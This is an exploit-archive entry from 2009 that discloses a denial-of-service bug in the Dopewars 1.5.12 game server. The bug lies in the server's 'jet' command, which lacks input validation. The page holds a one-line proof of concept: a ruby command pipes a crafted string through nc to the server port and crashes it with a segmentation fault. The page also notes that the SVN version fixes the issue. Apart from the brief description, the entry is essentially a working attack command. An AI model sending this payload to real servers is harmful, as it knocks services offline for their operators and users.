Dopewars 1.5.12 Server Denial of Service

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Dopewars 1.5.12 Server Denial of Service
# Published : 2009-10-06
# Author : Doug Prostko
# Previous Title : Firefox + Adobe Memory Corruption PoC
# Next Title : XLPD 3.0 Remote DoS

## Description ##

The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation.

## POC ##

ruby -e 'print "foo^^Ar1111111n^^Acfoon^AV65536n"' | nc localhost 7902

## Fix ##

This issue is resolved in the SVN version of the application.

## Discovered by Doug Prostko